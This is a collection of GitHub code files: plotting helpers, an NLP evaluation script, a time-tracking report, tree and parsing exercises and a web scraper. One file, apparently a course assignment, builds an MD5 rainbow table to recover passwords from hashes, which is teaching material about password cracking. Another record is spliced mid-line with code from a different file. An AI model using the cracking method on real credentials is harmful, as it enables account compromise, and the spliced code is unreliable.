+{"seq_id":"2648627903","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 20 17:52:01 2014\n\n@author: namm\n\"\"\"\nimport sys\nsys.path.append(\"..\")\nfrom agente_prospector.agente.controlo import Controlo\n\nfrom agente_prospector.controlo_react.reaccoes.reaccao_avancar import ReaccaoAvancar\n\n\nclass ControloReact(Controlo):\n \n def __init__(self):\n self._reaccao = ReaccaoAvancar()\n \n def processar(self, percepcao):\n accao = self._reaccao.activar(percepcao)\n return accao\n \n","repo_name":"jorge-ribamar/IASA","sub_path":"src/agente_prospector/controlo_react/controlo_react.py","file_name":"controlo_react.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11216205358","text":"import matplotlib.pyplot as plt\n\n\nclass VisualizePlays(object):\n def __init__(self, *agents, alpha=0.8):\n \"\"\"\n create a visualization method\n Args:\n agents (object): trained q-learning agent\n \"\"\"\n self.agents = agents\n self.aplpha = alpha\n self.x_label = \"#episodes\"\n\n def plot_reward(self):\n \"\"\"_summary_\"\"\"\n\n plt.title(\"Reward over time per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.rewards,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Reward\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_epsilon(self):\n \"\"\"_summary_\"\"\"\n\n # 2\n plt.title(\"Exploration parameter epsilon per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.epsilons,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Epsilon\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_last_agent_state(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Last state the agent is standing on at the end of the episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.last_states,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"last state number\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_q_values(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Average of the value of the q-table\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.q_averages,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"q-table average values\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot(self):\n \"\"\"_summary_\"\"\"\n\n plt.figure(figsize=(10, 20))\n\n plt.subplot(4, 1, 1)\n self.plot_reward()\n\n plt.subplot(4, 1, 2)\n self.plot_epsilon()\n\n plt.subplot(4, 1, 3)\n self.plot_last_agent_state()\n\n plt.subplot(4, 1, 4)\n self.plot_q_values()\n\n plt.tight_layout()\n plt.show()\n","repo_name":"MauroLuzzatto/Q-Learning-Demo-Play-nChain","sub_path":"helper_functions/visualize_plays.py","file_name":"visualize_plays.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"2556350229","text":"# user=int(input(\"enter the number :\"))\n# a=2\n# count=0\n# while a>0:\n# b=2\n# while b':\n if right:\n left.append(right.popleft())\n elif ch == '-':\n if left:\n left.pop()\n else:\n left.append(ch)\n print(''.join(left) + ''.join(right))\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Data_Structure/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2499039687","text":"import argparse\nfrom seqeval.metrics import classification_report\nfrom seqeval.metrics import accuracy_score\n\nfrom collections import defaultdict # available in Python 2.5 and newer\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef read_conllu(file, column):\n fin = open(file)\n sentences = []\n sentence = []\n for line in fin:\n if line.startswith('#'):\n continue\n if line is None or line == '\\n':\n sentences.append(sentence)\n sentence = []\n else:\n columns = line.rstrip().split('\\t')\n if not '.' in columns[0]:\n sentence.append(line.rstrip().split('\\t')[column])\n if len(sentence) > 0:\n sentences.append(sentence)\n return sentences\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--gold_file\", type=str)\nparser.add_argument(\"--pred_file\", type=str)\nparser.add_argument(\"--out_plot\", type=str)\nparser.add_argument(\"--column\", type=int, default=5)\nargs = parser.parse_args()\n\ny_true = read_conllu(args.gold_file, args.column)\ny_pred = read_conllu(args.pred_file, args.column)\n\nflat_y_true = [item for sublist in y_true for item in sublist]\nflat_y_pred = [item for sublist in y_pred for item in sublist]\n\nassert len(flat_y_true) == len(flat_y_pred)\n\nprint(classification_report(y_true, y_pred, digits=4))\nprint(accuracy_score(y_true, y_pred))\n\n# Creates a confusion matrix\nlabel_count = defaultdict(int)\nfor label in flat_y_true:\n label_count[label] += 1\n\nlabels = []\nfor l,c in label_count.items():\n if c > 20:\n labels.append(l)\n\ncm = confusion_matrix(flat_y_true, flat_y_pred, labels=labels)\ncm_df = pd.DataFrame(cm, index=labels, columns=labels)\n\nplt.figure(figsize=(50, 50))\nsns.heatmap(cm_df, annot=True, cmap=\"YlGnBu\")\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.savefig(args.out_plot, bbox_inches='tight')\nplt.close()\n\n","repo_name":"ahmetustun/udapter","sub_path":"scripts/seq_eval.py","file_name":"seq_eval.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"16"}
+{"seq_id":"5495328374","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 10 16:28:05 2021\n\n@author: lexipfalzgraf\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nHegelFreq=pd.read_csv('hegelFreq.csv')\nMacyFreq=pd.read_csv('macyFreq.csv')\nMontFreq=pd.read_csv('montFreq.csv')\nWebFreq=pd.read_csv('webFreq.csv')\nWilsonFreq=pd.read_csv('WilsonFreq.csv')\n\n\nplt.rcParams['font.sans-serif'] = \"Times New Roman\"\nplt.rcParams['font.family'] = \"sans-serif\"\nplt.locator_params(axis=\"x\", nbins=13)\nplt.locator_params(axis=\"y\", nbins=6)\nplt.xlabel(\"Year\", loc='center')\nplt.ylabel(\"Frequency of Usage by Author\", loc='center')\nplt.xticks(fontsize=10)\nplt.yticks(fontsize=10)\nplt.ylim(top=25) \nplt.ylim(bottom=0)\n\nMacyFreq['Rolling'] = MacyFreq['Frequence'].rolling(5).mean()\nMontFreq['Rolling'] = MontFreq['Frequence'].rolling(5).mean()\nWebFreq['Rolling'] = WebFreq['Frequence'].rolling(5).mean()\nWilsonFreq['Rolling'] = WilsonFreq['Frequence'].rolling(5).mean()\nHegelFreq['Rolling'] = HegelFreq['Frequence'].rolling(5).mean()\n\nHegelFreq['Rolling']= 100*HegelFreq['Rolling']\nMacyFreq['Rolling']= 100*MacyFreq['Rolling']\nMontFreq['Rolling']= 100*MontFreq['Rolling']\nWebFreq['Rolling']= 100*WebFreq['Rolling']\nWilsonFreq['Rolling']= 100*WilsonFreq['Rolling']\n\nplt.plot(HegelFreq['Year'], HegelFreq['Rolling'], label = \"Hegel\", color=\"gainsboro\",linewidth=1, linestyle=\"dashed\")\nplt.plot(MacyFreq['Year'], MacyFreq['Rolling'], label = \"Macy\", color=\"darkgrey\",linewidth=1, linestyle=\"dotted\")\nplt.plot(MontFreq['Year'], MontFreq['Rolling'], label = \"Montesquieu\", color=\"dimgrey\",linewidth=1, linestyle=\"dashdot\")\nplt.plot(WebFreq['Year'], WebFreq['Rolling'], label = \"Weber\", color=\"black\",linewidth=1, linestyle=\"solid\")\nplt.plot(WilsonFreq['Year'], WilsonFreq['Rolling'], label = \"Wilson\", color=\"lightgrey\",linewidth=1, linestyle=\"solid\")\n\n\nplt.legend(loc=1, prop={'size': 7})\n\n#plt.savefig(\"freqAuthors.png\",dpi=200, bbox_inches=\"tight\")\nplt.show()\n\n","repo_name":"lpfalz/SpiritData","sub_path":"frequencePlot.py","file_name":"frequencePlot.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18092751800","text":"import hashlib\r\nfrom os import read\r\nimport re\r\n\r\npwdListLength = 1\r\nrainbowTable = []\r\n\r\n# Read in list of possible pwds + print no. of pwds processed\r\ndef processFile():\r\n global pwdListLength\r\n txtFile = open(\"Wordlist.txt\")\r\n list = []\r\n for word in txtFile:\r\n #remove '/n' from readIn and append to list\r\n list.append([word.strip('\\n'),False])\r\n print(\"No. of words read from file:\",len(list))\r\n pwdListLength = len(list)\r\n return list\r\n\r\n# Reduction Function\r\ndef reductionFunc(reduced):\r\n global pwdListLength\r\n reduced = re.sub(r'[a-zA-Z]',\"\",reduced) # remove all alphabetic char\r\n reduced = (int(reduced) * (pwdListLength % 32)) # modulo by length of passwordList \r\n reduced = str(reduced) # convert back to str\r\n return str(reduced[:6]) # return first six digits\r\n\r\n# Hash Function\r\ndef hashFunc(hashed):\r\n #encode var to bytes\r\n enc = bytes(hashed, encoding='utf-8')\r\n enc = hashlib.md5(enc)\r\n return (enc.hexdigest())\r\n\r\n# Reduce and Hash Function\r\ndef redHashFunc(finalValue):\r\n finalValue = reductionFunc(finalValue)\r\n return hashFunc(finalValue)\r\n\r\n# generate rainbowTable into txt file\r\ndef tableGenerator(rainbowTable):\r\n txtFile = open('Rainbowtable.txt','w')\r\n for i in rainbowTable:\r\n txtFile.write(\"%s %s \\n\" % (i[0],i[1]))\r\n txtFile.close\r\n print(\"Rainbowtable.txt consists of %s lines.\"%(len(rainbowTable)))\r\n\r\npasswordList = processFile()\r\n\r\nfor word in passwordList:\r\n word[1] = True\r\n pw = word[0]\r\n pw = hashFunc(pw)\r\n for i in range(5):\r\n pw = redHashFunc(pw)\r\n rainbowTable.append([word[0],pw])\r\n\r\n#sort table by hash values.\r\nrainbowTable = sorted(rainbowTable, key=lambda x:x[1]) \r\ntableGenerator(rainbowTable)\r\n\r\n# SECOND STEP\r\n# check if hash value exists in table\r\ndef checkHash(hash):\r\n for value in rainbowTable:\r\n if hash == value[1]:\r\n return (True,value)\r\n return (False,None)\r\n\r\ndef findHash(hash):\r\n count = 0\r\n while (count < 10000):\r\n hash = reductionFunc(hash)\r\n hash = hashFunc(hash)\r\n count += 1\r\n result = checkHash(hash)\r\n if (result[0]): \r\n #return word if found\r\n return result[1][0]\r\n print(\"Unable to identify hash\")\r\n exit()\r\n\r\n# function to check if word matches hash value\r\ndef checkWordHash(word,hash):\r\n count = 0\r\n word = hashFunc(word)\r\n while((word!=hash)):\r\n word = redHashFunc(word)\r\n count += 1\r\n if count>10000:\r\n print (\"Unable to match word to hash value\")\r\n exit()\r\n return True\r\n\r\n# user input\r\nhash_input=''\r\n\r\nwhile(True):\r\n print(\"\\nPlease enter hash value\")\r\n hash_input = input()\r\n if(len(hash_input) == 32): # check that hash value length is 32\r\n break\r\n else:\r\n print('Hash Value does not exist!')\r\n\r\nresult = checkHash(hash_input)\r\n\r\nif(result[0]):\r\n if(checkWordHash ( result[1][0], hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" found! The word is\",result[1][0])\r\nelse:\r\n word = findHash(hash_input)\r\n if(checkWordHash ( word, hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" The word is\", word)","repo_name":"kikoken831/CSIT622","sub_path":"old/Assignment 1/rainbowTable.py","file_name":"rainbowTable.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"70044476490","text":"# ToDo: Don't stretch line for over-spent time\n# Normal time input\n# Overall time on the title of figure\n\nimport argparse\nimport yaml\nimport re\nimport math\nimport pandas as pd\nfrom datetime import datetime\nfrom dateutil import parser\nfrom clockify import factories\nfrom clockify_api_client.client import ClockifyAPIClient\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef match(done_project, done_task, target_task):\n target_task = str(target_task).strip().lower()\n if target_task.startswith('project:'):\n target_project = target_task[8:].strip()\n done_project = str(done_project).lower()\n return done_project == target_project\n elif target_task.startswith('task:'):\n target_desc = target_task[5:].strip()\n done_task = str(done_task).lower()\n return target_desc in done_task\n else:\n raise 'Unknown task description!'\n\n\ndef read_clockify(config):\n api_key = config['clockify']['api_key']\n workspace_name = config['clockify']['workspace_name']\n user_name = config['clockify']['user_name']\n\n workspace_id = None\n for workspace in factories.Workspace(api_key=api_key).get_all_workspaces():\n if (workspace['name'] == workspace_name) or (workspace_name == ''):\n workspace_id = workspace['id']\n if workspace_id is None:\n raise ValueError(f'workspace {workspace_name} not found!')\n\n user_id = None\n for user in factories.User(api_key=api_key).get_all_workspace_users(workspace_id=workspace_id):\n if (user['name'] == user_name) or (user_name == ''):\n user_id = user['id']\n if user_id is None:\n raise ValueError(f'user {user_name} not found!')\n\n client = ClockifyAPIClient().build(api_key, 'api.clockify.me/v1')\n projects = dict()\n for project in client.projects.get_projects(workspace_id):\n if not project['archived']:\n projects[project['id']] = project['name']\n\n entries = factories.TimeEntry(api_key=api_key).get_all_time_entry_user(workspace_id=workspace_id,\n user_id=user_id)\n return workspace_id, user_id, projects, entries\n\n\ndef process_entry(done, projects, task=None):\n elapsed = 0\n duration = done['timeInterval']['duration']\n if duration is None: # When clockify is running\n return 0\n r = re.match(r\"PT(\\d*H)?(\\d*M)?(\\d*S)?\", duration)\n if r.group(1):\n elapsed += int(r.group(1)[:-1])\n if r.group(2):\n elapsed += int(r.group(2)[:-1]) / 60\n if r.group(3):\n elapsed += int(r.group(3)[:-1]) / 3600\n\n if (task is None) or match(projects[done['projectId']], done['description'], task['Description']):\n return elapsed\n return 0\n\n\ndef process_entries(config, entries, projects):\n tasks_path = config['tasks']['file_path']\n sheet_name = config['tasks']['sheet_name']\n start_of_sprint = config['sprint']['start_of_sprint']\n end_of_sprint = start_of_sprint + len(config['sprint']['sprint_days']) * 86400\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n\n # Read tasks and sort to place tasks above projects\n # (to avoid double calculation of clockify entries which match both a project and a task)\n tasks = pd.read_excel(tasks_path, sheet_name=sheet_name).sort_values('Description', ascending=False).reset_index(\n drop=True)\n total_scheduled_hours = sum(tasks['Estimated Hours'])\n\n # Process time entries\n results = [[0.0, float(d['Estimated Hours']), d['Description']] for i, d in\n tasks.iterrows()] # (spend_hours, estimated_hours)\n\n processed_ids = [] # get_all_time_entry_user returns each entry multiple times, so we need to check them.\n off_schedule_spent = 0\n for entry 
in entries:\n date = parser.parse(entry['timeInterval']['start']).timestamp()\n if (start_of_sprint <= date < end_of_sprint) and (entry['id'] not in processed_ids):\n entry_matched = False\n processed_ids.append(entry['id'])\n for i, t in tasks.iterrows():\n elapsed_time = process_entry(done=entry, projects=projects, task=t)\n results[i][0] += elapsed_time\n if elapsed_time > 0:\n entry_matched = True\n break\n if not entry_matched:\n off_schedule_spent += process_entry(done=entry, projects=projects)\n\n results.append([off_schedule_spent, total_sprint_time - total_scheduled_hours, 'Off-scheduled'])\n return results, total_scheduled_hours\n\n\ndef plot_results(config, results, total_scheduled_hours):\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n start_of_sprint = config['sprint']['start_of_sprint']\n sprint_days = config['sprint']['sprint_days']\n\n df = []\n for r in results:\n df.append(['Spent', r[0] / r[1], r[0], r[2]])\n df.append(['Estimated', 1, r[1], r[2]])\n df = pd.DataFrame(df, columns=['Type', 'Hours-Rate', 'Hours-Val', 'Task'])\n\n sns.set(rc={'figure.figsize': (14, 6)}, font_scale=1)\n g = sns.barplot(x=\"Hours-Rate\", y=\"Task\",\n hue=\"Type\", data=df, palette='copper')\n g.legend_ = None\n g.set(xticklabels=[])\n g.set(xlabel='Hours')\n total_spent_scheduled_hours = sum(\n [min(r[0], r[1]) for r in results[:-1]]) # Just scheduled tasks. Times spent more than scheduled not considered\n total_spent_hours = sum([r[0] for r in results])\n\n # Compute expected progress\n passed_full_days = math.floor((datetime.now().timestamp() - start_of_sprint) / 86400)\n working_full_days = sum(sprint_days[:passed_full_days])\n if passed_full_days < len(sprint_days):\n today_expected_progress = (datetime.now().timestamp() - (start_of_sprint + passed_full_days * 86400)) * sprint_days[passed_full_days]\n else:\n today_expected_progress = 0\n expected_progress = (working_full_days * 86400 + today_expected_progress) / (sum(sprint_days)*86400) * 100\n\n g.set(title=f\"Tasks achievement: {total_spent_scheduled_hours / total_scheduled_hours * 100:.1f}% - \" +\n f\"Total time: {total_spent_hours / total_sprint_time * 100:.1f}% - \" +\n f\"Expected: {expected_progress:.1f}%\")\n\n for i, container in enumerate(g.containers):\n if i == 0: # spent\n g.bar_label(container, [f\"{r[0] / r[1] * 100:.1f}%\" for r in results])\n else: # estimated\n g.bar_label(container, [f\"{r[1]:.2f}\" for r in results])\n plt.subplots_adjust(left=0.25)\n plt.show()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', type=argparse.FileType('r'),\n default='config.yml', help='config file for %(prog)s')\n args = parser.parse_args()\n config = yaml.load(args.config.read(), Loader=yaml.SafeLoader)\n\n try:\n workspace_id, user_id, projects, entries = read_clockify(config=config)\n results, total_scheduled_hours = process_entries(config=config,\n entries=entries,\n projects=projects)\n plot_results(config=config,\n results=results,\n total_scheduled_hours=total_scheduled_hours)\n except ValueError as err:\n print(err.args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"h-amirkhani/clockify-scrum","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"24702619797","text":"from torch import nn\nfrom torch.nn import TransformerEncoder, TransformerEncoderLayer, Parameter, Linear, Module, ReLU, GELU\n\n\nclass TransformerBlock(Module):\n def __init__(self, d_model, nhead, dff, activation, num_layers):\n super().__init__()\n assert activation in ['relu', 'gelu']\n if activation == 'relu':\n self.activation = ReLU(inplace=True)\n elif activation == 'gelu':\n self.activation = GELU()\n self.transformer_block = TransformerEncoder(\n TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=dff, activation=activation,\n batch_first=True, dropout=0.), num_layers=num_layers)\n\n def forward(self, x):\n return self.transformer_block(x)\n","repo_name":"caihao/SWD-EvtGen","sub_path":"src/models/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"6469939681","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 16 12:03:23 2019\n\n@author: zhangzhaopeng\n\"\"\"\n\n## binary search tree\n\nclass TreeNode():\n \n def __init__(self, value):\n self.val = value\n self.left = None\n self.right = None\n\nclass binary_search_tree():\n \n def __init__(self):\n \n self.root = None\n \n# def insert(self, val):\n# \n# s = TreeNode(val)\n# if self.root == None:\n# self.root = s\n# else:\n# if s.val < self.root.val:\n# self.insert(root.left, s)\n# else:\n# self.insert(root.right, s)\n \n def insert(self, val):\n \n node = TreeNode(val)\n if self.root == None:\n self.root = node\n else:\n cur = self.root\n if val < cur.val:\n if cur.left == None:\n cur.left = node\n else:\n if cur.right == None:\n cur.right = node\n \n\n# def insert(self, value: int):\n# if not self.root:\n# self.root = TreeNode(value)\n# return\n# parent = None\n# node = self.root\n# while node:\n# parent = node\n# node = node.left if node.val > value else node.right\n# new_node = TreeNode(value)\n# if parent.val > value:\n# parent.left = new_node\n# else:\n# parent.right = new_node\n \n def delete(self, val):\n \n node = self.root\n parent = None\n while node and node.val != val:\n parent = node\n node = node.left if node.val > val else node.right\n \n if not node:\n return \n \n if node.left == None and node.right == None:\n parent.left = None\n \n elif node.left == None:\n parent.left = node.right\n elif node.right == None:\n parent.left = node.left\n else:\n par = node\n s = node.right\n while s.left:\n par = s\n s = s.left\n node.val = s.val\n if par == node:\n par.right = s.right\n else:\n par.left = s.right\n \n def find(self, val):\n \n node = self.root\n while node and node.val != val:\n node = node.left if node.val > val else node.right\n return node\n\n\n# test\n\nt = binary_search_tree()\nt.insert(1)\nt.insert(2)\nt.insert(3)\n\nt.delete(3)\n\nt.find(1)\n\n\n\n\n","repo_name":"zhangzhp7/Algorithm","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43627318467","text":"# 638/378\nfrom sys import stdin\nfrom re import compile\n\ndef parse_lines(lines):\n # hcl:#6b5442 ... -> [('hcl', '#6b5442'), ...]\n return [(typ, v) for line in map(lambda x: map(lambda x: x.split(':'), x.split(' ')), lines.split('\\n')) for typ, v in line]\n\ndata = list(map(parse_lines, stdin.read().strip().split('\\n\\n')))\n# Rules for A\nneeded = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']\n# Rules for B\nhgt, hcl, pid = compile('^(\\d+)(cm|in)$'), compile('^#[0-9a-f]{6}$'), compile('^\\d{9}$')\necl = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n\ndef valid(typ, v):\n if typ == 'byr':\n return 1920 <= int(v) <= 2002\n if typ == 'iyr':\n return 2010 <= int(v) <= 2020\n if typ == 'eyr':\n return 2020 <= int(v) <= 2030\n if typ == 'hgt':\n matches = hgt.match(v)\n if matches is None:\n return False\n n, u = matches.groups()\n return 150 <= int(n) <= 193 if u == 'cm' else 59 <= int(n) <= 76\n if typ == 'hcl':\n return hcl.match(v) is not None\n if typ == 'ecl':\n return v in ecl\n if typ == 'pid':\n return pid.match(v) is not None\n return True\n\na, b = 0, 0\nfor pp in data:\n if all(n in [typ for typ, _ in pp] for n in needed):\n a += 1\n if all(valid(typ, v) for typ, v in pp):\n b += 1\n\nprint('a', a)\nprint('b', b)\n","repo_name":"stristr/aoc2020","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38375758085","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nfrom flask import flash \n\nclass Book_Author:\n def __init__(self,data):\n self.book_id = data['book_id']\n self.author_id = data['author_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n# ============================================= \n# INSERT : new book / author ids\n# ============================================= \n @classmethod\n def add_new_book_author(cls,data):\n query = \"INSERT INTO books_authors (book_id,author_id) VALUES (%(book_id)s, %(author_id)s);\"\n results = connectToMySQL('book_club').query_db(query,data)\n return results","repo_name":"bakerlisa/NightOwl","sub_path":"flask_app/models/book_author_model.py","file_name":"book_author_model.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"9541884799","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='collective.mdlevent',\n version=version,\n description=\"Multi dates and locations event for Plone\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.0\",\n \"Framework :: Plone :: 4.1\",\n \"Framework :: Plone :: 4.2\",\n ],\n keywords='',\n author='',\n author_email='',\n url='http://svn.plone.org/svn/collective/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'plone.app.dexterity',\n 'five.grok',\n 'z3c.blobfile',\n # -*- Extra requirements: -*-\n ],\n extras_require = dict(\n tests=['plone.app.testing'],\n ),\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","repo_name":"toutpt/collective.mdlevent","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"42030679722","text":"from django.forms.models import model_to_dict\nfrom rpc4django import rpcmethod\n\nimport molecule.models as molecule_models\n\n@rpcmethod(name='molecule.ping', signature=[])\ndef ping():\n return 'PONG'\n \n\n@rpcmethod(name='molecule.list', signature=[])\ndef list():\n molecules = molecule_models.Molecule.objects.all()\n x = [model_to_dict(molecule) for molecule in molecules]\n\n return x","repo_name":"rmcl/rcell","sub_path":"rcell-kb/kb/core/molecule/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2822541870","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 27 17:53:25 2021\r\n\r\n@author: Nishith\r\n\"\"\"\r\n\r\nn=input(\"Please enter a number: \")\r\nsum=0\r\nn=eval(n)\r\nfor i in range(1,n+1):\r\n sum=sum+i*i*i\r\nprint(sum)\r\n","repo_name":"Nishith170217/Python-Self-Challenge","sub_path":"Program for cube sum of first n natural numbers.py","file_name":"Program for cube sum of first n natural numbers.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71990774407","text":"import scrapy,re\nfrom bs4 import BeautifulSoup as bs\n\nclass FddbSpider(scrapy.Spider):\n \"\"\"\n Scrapy spider meant to crawl all nutritional information \n about a product from http://fddb.info\n \"\"\"\n name = \"fddb\"\n start_urls = [\n \"http://fddb.info/db/fr/groupes/{}/index.html\".format(group)\n for group in [\n \"epice\", \"boissons\", \"congelateur\", \"fromages\", \n \"garniture\", \"international\", \"legumineuse\", \"mets\", \n \"pomme_de_terre\", \"viande\", \"autre\", \"cereale\", \n \"friterie\", \"fruits\", \"huiles_et_lipides\", \"legumes\", \n \"laitage\", \"poisson\", \"sucreries\"]\n ]\n\n \n def parse(self, response):\n # Parse groups if there are any\n groups_b = response.css('div.leftblock h3:first-child::text').extract_first()\n if groups_b:\n # Follow the \"groups\" links \n groups = response.css('div.leftblock div.standardcontent:first-child table td table td:first-child a::attr(href)').extract()\n for group in groups:\n group_page = response.urljoin(group.strip())\n yield scrapy.Request(group_page, callback=self.parse)\n \n # Parse producers if there are any\n producers_b = response.css('div.leftblock h4.grouppreproducthead::text').extract_first()\n if producers_b:\n nb_child = \"n + 2\" if groups_b else \"n\"\n query = 'div.leftblock > div:nth-child({}) table a::attr(href)'.format(nb_child)\n products = response.css(query).extract()\n for product in products:\n product_page = response.urljoin(product.strip())\n yield scrapy.Request(product_page, callback=self.parse_product)\n \n\n\n def parse_product(self, response):\n nutriments = []\n value_unit_re = r\"^([\\d,]+)\\s(\\w+)$\"\n \n # Extracts all nutriments information\n if response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first():\n rows = response.css('div.itemsec2012:first-child ~ div > div').extract() \n # Even rows are nutriments' names, odd rows are nutriments' values and units\n i = 0\n while i < len(rows)-1:\n nutriment = {}\n html_name = bs(rows[i], 'html.parser')\n html_value = bs(rows[i+1], 'html.parser')\n i += 2\n\n # Skip \"Water content\"\n name = html_name.span.string\n if \"Water\" in name:\n continue\n \n # Rename nutriments with the names \n # already present in our ElasticSearch (ES) instance\n if name == \"Valeur énergétique\":\n name = \"Énergie\"\n elif name == \"Calorie\":\n name = \"Énergie (kCal)\"\n elif name == \"Lipides\":\n name = \"Matières grasses\"\n elif name == \"Sucre\":\n name = \"Sucres\"\n \n # Sperate values and units\n value, unit = re.match(value_unit_re, html_value.text).groups()\n value = float(value.replace(',', '.'))\n\n if unit == \"kcal\":\n unit = \"kCal\"\n\n nutriment['name'] = name\n nutriment['unit'] = unit\n nutriment['per_day'] = 0\n nutriment['per_portion'] = 0\n nutriment['per_hundred'] = value\n nutriment['rdi'] = 0\n \n nutriments.append(nutriment)\n \n unit = 'ml' if 'ml' in response.css(\"div.leftblock div.itemsec2012:first-child h2::text\").extract_first() else 'g'\n # Output ready to be sent to ES\n yield {\n '_index': \"products\",\n '_type': \"FDDB\",\n '_source': {\n 'name': self.clean_name(response.css(\"h1#fddb-headline1::text\").extract_first()),\n 'unit': unit,\n 'unit_quantity': unit,\n 'unit_portion': 0,\n 'quantity': 100,\n 'nutriments': nutriments\n }\n }\n\n def clean_name(self, name):\n # Removes generic words inside product name\n reg = r\",\\s(\"\\\n \"séché[es]*|\" \\\n \"sèches?|\" \\\n \"secs?|\" \\\n \"cuit[es]*|\" \\\n \"grain[es]*|\" \\\n \"frais|\" \\\n 
